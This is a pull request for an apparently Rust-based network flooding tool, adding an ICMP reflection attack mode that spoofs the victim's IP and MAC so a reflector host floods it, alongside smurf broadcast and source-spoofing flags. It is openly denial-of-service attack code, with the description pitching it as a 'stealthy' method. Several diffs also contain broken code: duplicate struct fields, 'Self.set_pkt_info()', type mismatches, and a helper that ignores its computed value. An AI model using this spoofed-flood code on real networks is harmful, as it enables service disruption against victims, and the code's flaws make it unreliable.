### PR TITLE
Reflection Attack Feature for PingFlooder

### DIFF
--- a/README.md
+++ b/README.md
@@ -16,7 +16,7 @@
   <tr>
     <td style="width:50%; vertical-align: top; padding: 15px; background-color: #0D1117; color: #C9D1D9; border-radius: 8px; height: 150px;">
       <ul style="list-style-type: none; padding-left: 0; margin: 0;">
-        <li><strong><em>Authentication Flooding</em></strong></li>
+        <li><strong><em>802.11 Authentication Flooding</em></strong></li>
         <li><strong><em>ICMP (Ping) Flooding</em></strong></li>
         <li><strong><em>Packet Flooding</em></strong></li>
         <li><strong><em>Protocol Tunneling test</em></strong></li>

--- a/src/arg_parser/auth_parser.rs
+++ b/src/arg_parser/auth_parser.rs
@@ -5,7 +5,7 @@ use crate::utils::parse_mac;
 
 
 #[derive(Parser)]
-#[command(name = "auth", about = "Authentication flooder")]
+#[command(name = "auth", about = "802.11 Authentication flooder")]
 pub struct AuthArgs {
 
     /// Interface to be use to send the frames

--- a/src/arg_parser/flood_ping_parser.rs
+++ b/src/arg_parser/flood_ping_parser.rs
@@ -7,43 +7,47 @@ use clap::Parser;
 #[command(name = "ping", about = "Ping Flooder")]
 pub struct PingArgs {
 
-    /// Target IP
+    /// Target IP address to flood
     pub target_ip: Ipv4Addr,
 
 
-    /// Define the target MAC
+    /// Target MAC address
     pub target_mac: String,
 
 
-    /// Use the Smurf attack
-    ///
-    /// This attack send a ping broadcast
+    /// Use Smurf attack (sends ping broadcasts)
     #[arg(short = 'S', long)]
     pub smurf: bool,
 
 
-    /// Set an IP to perform a Reflection Attack
+    /// IP address for Reflection Attack
     ///
-    /// The host with this IP will send the reply packets to the target
-    /// WARNING: THIS FLAG WILL BE IGNORED IF THE SMURF FLAG IS USED
+    /// Host with this IP will send replies to target
+    /// NOTE: Ignored if --smurf flag is used
     #[arg(long)]
     pub mirror_ip: Option<Ipv4Addr>,
 
 
-    /// Set a MAC to perform a Reflection Attack
-    /// 
-    /// The host with this MAC will send the reply packets to the target
-    /// Write "local" to use the iface MAC
-    /// WARNING: THIS MAC WILL BE USED IF A MIRROR IP IS SET TOO
+    /// MAC address for Reflection Attack
+    ///
+    /// Host with this MAC will send replies to target
+    /// Use "local" for interface's MAC address
+    /// NOTE: Requires --mirror-ip to be effective
     #[arg(long)]
     pub mirror_mac: Option<String>,
 
-
-    // Set a MAC to perform a Reflection Attack
-    /// 
-    /// The host with this MAC will send the reply packets to the target
-    /// WARNING: THIS MAC WILL BE USED IF A MIRROR IP IS SET TOO
+    
+    /// Source IP address (spoofing)
+    ///
+    /// NOTE: Ignored if --smurf or --mirror-ip are used
     #[arg(long)]
-    pub mirror_mac: Option<String>,
+    pub src_ip: Option<Ipv4Addr>,
+
+    
+    /// Source MAC address (spoofing)
+    ///
+    /// NOTE: Ignored if --smurf or --mirror-ip are used
+    #[arg(long)]
+    pub src_mac: Option<String>,
 
 }

--- a/src/arg_parser/flood_ping_parser.rs
+++ b/src/arg_parser/flood_ping_parser.rs
@@ -25,7 +25,7 @@ pub struct PingArgs {
     /// Host with this IP will send replies to target
     /// NOTE: Ignored if --smurf flag is used
     #[arg(long)]
-    pub mirror_ip: Option<Ipv4Addr>,
+    pub reflector_ip: Option<Ipv4Addr>,
 
 
     /// MAC address for Reflection Attack
@@ -34,7 +34,7 @@ pub struct PingArgs {
     /// Use "local" for interface's MAC address
     /// NOTE: Requires --mirror-ip to be effective
     #[arg(long)]
-    pub mirror_mac: Option<String>,
+    pub reflector_mac: Option<String>,
 
     
     /// Source IP address (spoofing)

--- a/src/arg_parser/flood_ping_parser.rs
+++ b/src/arg_parser/flood_ping_parser.rs
@@ -1,6 +1,6 @@
 use std::net::Ipv4Addr;
 use clap::Parser;
-use crate::utils::parse_mac;
+
 
 
 #[derive(Parser)]
@@ -12,8 +12,7 @@ pub struct PingArgs {
 
 
     /// Define the target MAC
-    #[arg(value_parser = parse_mac)]
-    pub target_mac: [u8; 6],
+    pub target_mac: String,
 
 
     /// Use the Smurf attack
@@ -21,5 +20,30 @@ pub struct PingArgs {
     /// This attack send a ping broadcast
     #[arg(short = 'S', long)]
     pub smurf: bool,
+
+
+    /// Set an IP to perform a Reflection Attack
+    ///
+    /// The host with this IP will send the reply packets to the target
+    /// WARNING: THIS FLAG WILL BE IGNORED IF THE SMURF FLAG IS USED
+    #[arg(long)]
+    pub mirror_ip: Option<Ipv4Addr>,
+
+
+    /// Set a MAC to perform a Reflection Attack
+    /// 
+    /// The host with this MAC will send the reply packets to the target
+    /// Write "local" to use the iface MAC
+    /// WARNING: THIS MAC WILL BE USED IF A MIRROR IP IS SET TOO
+    #[arg(long)]
+    pub mirror_mac: Option<String>,
+
+
+    // Set a MAC to perform a Reflection Attack
+    /// 
+    /// The host with this MAC will send the reply packets to the target
+    /// WARNING: THIS MAC WILL BE USED IF A MIRROR IP IS SET TOO
+    #[arg(long)]
+    pub mirror_mac: Option<String>,
 
 }

--- a/src/engines/flood_ping.rs
+++ b/src/engines/flood_ping.rs
@@ -58,7 +58,7 @@ impl PingFlooder {
     fn set_pkt_info_for(&mut self) {
         if self.args.smurf {
             self.smurf_attack();
-        } else if self.args.mirror_ip.is_some() {
+        } else if self.args.reflector_ip.is_some() {
             self.reflection_attack();
         } else {
             self.direct_attack();
@@ -79,11 +79,11 @@ impl PingFlooder {
     fn reflection_attack(&mut self) {
         self.pkt_data.src_ip  = Some(self.args.target_ip);
         self.pkt_data.src_mac = self.resolve_mac(Some(self.args.target_mac.clone()));
-        self.pkt_data.dst_ip  = self.args.mirror_ip;
-        self.pkt_data.dst_mac = if self.args.mirror_mac.is_none() {
+        self.pkt_data.dst_ip  = self.args.reflector_ip;
+        self.pkt_data.dst_mac = if self.args.reflector_mac.is_none() {
                 None 
             } else {
-                self.resolve_mac(self.args.mirror_mac.clone())
+                self.resolve_mac(self.args.reflector_mac.clone())
             };
     }
 

--- a/src/engines/flood_ping.rs
+++ b/src/engines/flood_ping.rs
@@ -6,7 +6,7 @@ use crate::generators::RandValues;
 use crate::iface::IfaceInfo;
 use crate::pkt_builder::PacketBuilder;
 use crate::sockets::Layer2RawSocket;
-use crate::utils::{inline_display, get_first_and_last_ip, CtrlCHandler};
+use crate::utils::{inline_display, get_first_and_last_ip, CtrlCHandler, use_local_or_input_mac};
 
 
 
@@ -17,6 +17,15 @@ pub struct PingFlooder {
     iface:      String,
     broadcast:  Ipv4Addr,
     pkts_sent:  usize,
+    pkt_info:   PacketInfo,
+}
+
+
+struct PacketInfo {
+    src_ip:  Option<Ipv4Addr>,
+    src_mac: Option<[u8; 6]>,
+    dst_ip:  Option<Ipv4Addr>,
+    dst_mac: Option<[u8; 6]>,
 }
 
 
@@ -28,40 +37,53 @@ impl PingFlooder {
         let (first_ip, last_ip) = get_first_and_last_ip(&iface);
 
         Self {
-            rand:       RandValues::new(Some(first_ip), Some(last_ip)),
-            builder:    PacketBuilder::new(),
-            pkts_sent:  0,
-            broadcast:  Self::get_broadcast(&iface),
+            rand:      RandValues::new(Some(first_ip), Some(last_ip)),
+            builder:   PacketBuilder::new(),
+            pkts_sent: 0,
+            pkt_info:  PacketInfo {None, None, None, None},
             iface,
             args,
         }
     }
 
-
-
-    fn get_broadcast(iface: &str) -> Ipv4Addr {
-        let (ip, prefix) = Self::get_ip_and_prefix(iface);
-        let ip_u32       = u32::from(ip);
-        
-        let mask = if prefix == 0 { 0 } else { (!0u32) << (32 - prefix) };
-        let broadcast_u32 = ip_u32 | !mask;
-        Ipv4Addr::from(broadcast_u32)
-    }
-
-    
-    
-    fn get_ip_and_prefix(iface: &str) -> (Ipv4Addr, u8) {
-        let cidr             = IfaceInfo::iface_network_cidr(iface).unwrap();
-        println!("{}",cidr);
-        let parts: Vec<&str> = cidr.split('/').collect();
-        let ip: Ipv4Addr     = parts[0].parse().unwrap();
-        let prefix: u8       = parts[1].parse().unwrap();
-        (ip, prefix)
-    }
-
     
     
     pub fn execute(&mut self){
+        Self.set_pkt_info();
+        self.send_endlessly();
+    }
+
+
+
+    fn set_pkt_info(&mut self) {
+        if self.args.smurf {
+            self.set_info_for_smurf_attack();
+        } else if self.args.mirror_ip {
+            self.set_info_for_reflection_attck();
+        }
+    }
+
+
+
+    fn set_info_for_smurf_attack(&mut self) {
+        self.pkt_info.src_ip  = self.args.target_ip;
+        self.pkt_info.src_mac = self.args.target_mac;
+        self.pkt_info.dst_ip  = IfaceInfo::get_broadcast_ip(&self.iface);
+        self.pkt_info.dst_mac = [0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF];
+    }
+
+
+
+    fn set_info_for_reflection_attck(&mut self) {
+        self.pkt_info.src_ip  = self.args.target_ip;
+        self.pkt_info.src_mac = self.args.target_mac;
+        self.pkt_info.dst_ip  = self.args.mirror_ip.unwrap();
+        self.pkt_info.dst_mac = use_local_or_input_mac(&self.args.mirror_mac);
+    }
+
+    
+
+    fn send_endlessly(&mut self) {
         let l2_socket = Layer2RawSocket::new(&self.iface);
         let running   = Arc::new(AtomicBool::new(true));
         CtrlCHandler::setup(running.clone());

--- a/src/engines/net_info.rs
+++ b/src/engines/net_info.rs
@@ -12,7 +12,7 @@ impl NetworkInfo {
         for (i, iface) in IfaceInfo::get_iface_names().into_iter().enumerate() {
             let state       = Self::get_state(&iface);
             let if_type     = Self::get_type(&iface);
-            let mac         = Self::get_mac(&iface);
+            let mac         = IfaceInfo::get_mac(&iface);
             let ip          = Self::get_ip(&iface);
             let cidr        = Self::get_cidr(&iface);
             let host_len    = Self::get_len_host(&cidr);
@@ -35,17 +35,8 @@ impl NetworkInfo {
 
 
 
-    fn get_info(info_type: &str, iface: &str) -> String {
-        let info = format!("/sys/class/net/{}/{}", iface, info_type);
-        
-        fs::read_to_string(&info)
-            .map(|content| content.trim().to_string())
-            .unwrap_or_else(|_| "Unknown".to_string())
-    }
-
-
     fn get_state(iface: &str) -> String {
-        Self::get_info("operstate", &iface).to_uppercase()
+        IfaceInfo::get_info("operstate", &iface).to_uppercase()
     }
 
 
@@ -67,12 +58,6 @@ impl NetworkInfo {
 
 
 
-    fn get_mac(iface: &str) -> String {
-        Self::get_info("address", &iface)
-    }
-
-
-
     fn get_ip(iface: &str) -> String {
         match IfaceInfo::iface_ip(iface) {
             Ok(ip) => ip.to_string(),
@@ -82,13 +67,13 @@ impl NetworkInfo {
 
 
 
-
     fn get_cidr(iface: &str) -> String {
         match IfaceInfo::iface_network_cidr(iface) {
             Ok(ip) => ip.to_string(),
             Err(_) => "Unknown".to_string(),
         }
     }
+
 
 
     fn get_len_host(cidr: &str) -> String {
@@ -119,7 +104,7 @@ impl NetworkInfo {
 
 
     fn get_mtu(iface: &str) -> String {
-        Self::get_info("mtu", &iface)
+        IfaceInfo::get_info("mtu", &iface)
     }
 
 

--- a/src/main.rs
+++ b/src/main.rs
@@ -80,7 +80,7 @@ impl Command {
     
     fn display_commands() {
         println!("\nAvailable commands:");
-        println!("\tauth   -> Authentication Flooding");
+        println!("\tauth   -> 802.11 Auth Flooding");
         println!("\tbanner -> Banner Grabbing");
         println!("\tflood  -> Packet Flooding");
         println!("\tinfo   -> Network Information");

--- a/src/utils/mac_parser.rs
+++ b/src/utils/mac_parser.rs
@@ -1,11 +1,12 @@
+use crate::iface::IfaceInfo;
 use crate::utils::abort;
 
 
 
-pub fn parse_mac(s: &str) -> Result<[u8; 6], String> {
-    let parts: Vec<&str> = s.split(':').collect();
+pub fn parse_mac(input: &str) -> [u8; 6] {
+    let parts: Vec<&str> = input.split(':').collect();
     if parts.len() != 6 {
-        abort(format!("Invalid MAC: {}", s));
+        abort(format!("Invalid MAC: {}", input));
     }
 
     let mut mac = [0u8; 6];
@@ -15,4 +16,16 @@ pub fn parse_mac(s: &str) -> Result<[u8; 6], String> {
     }
 
     Ok(mac)
+}
+
+
+
+pub fn use_local_or_input_mac(input: &str, iface: &str) -> [u8; 6] {
+    let mac_to_parse = if input == "local".to_string() {
+        IfaceInfo::get_mac(iface);
+    } else {
+        input;
+    }
+
+    parse_mac(input)
 }

--- a/src/utils/mac_parser.rs
+++ b/src/utils/mac_parser.rs
@@ -1,9 +1,8 @@
-use crate::iface::IfaceInfo;
 use crate::utils::abort;
 
 
 
-pub fn parse_mac(input: &str) -> [u8; 6] {
+pub fn parse_mac(input: &str) -> Result<[u8; 6], String> {
     let parts: Vec<&str> = input.split(':').collect();
     if parts.len() != 6 {
         abort(format!("Invalid MAC: {}", input));
@@ -16,16 +15,4 @@ pub fn parse_mac(input: &str) -> [u8; 6] {
     }
 
     Ok(mac)
-}
-
-
-
-pub fn use_local_or_input_mac(input: &str, iface: &str) -> [u8; 6] {
-    let mac_to_parse = if input == "local".to_string() {
-        IfaceInfo::get_mac(iface);
-    } else {
-        input;
-    }
-
-    parse_mac(input)
 }


### PR DESCRIPTION
This PR introduces a new sub-feature to the PingFlooder tool, enabling it to perform reflection attacks.

### Changes
The core addition is the implementation of the reflection attack technique. Instead of sending pings directly to the target, the tool can now send requests to an active reflector host on the network, while spoofing the source IP address to be that of the intended target. Consequently, the reflector host will send its responses to the spoofed IP, effectively targeting the victim.

### To configure this, two new flags have been added:
- `--reflector-ip`: Specifies the IP address of the reflector host.
- `--reflector-mac`: Specifies the MAC address of the same reflector host.

This enhancement provides a more advanced and stealthy method for network stress testing and analysis.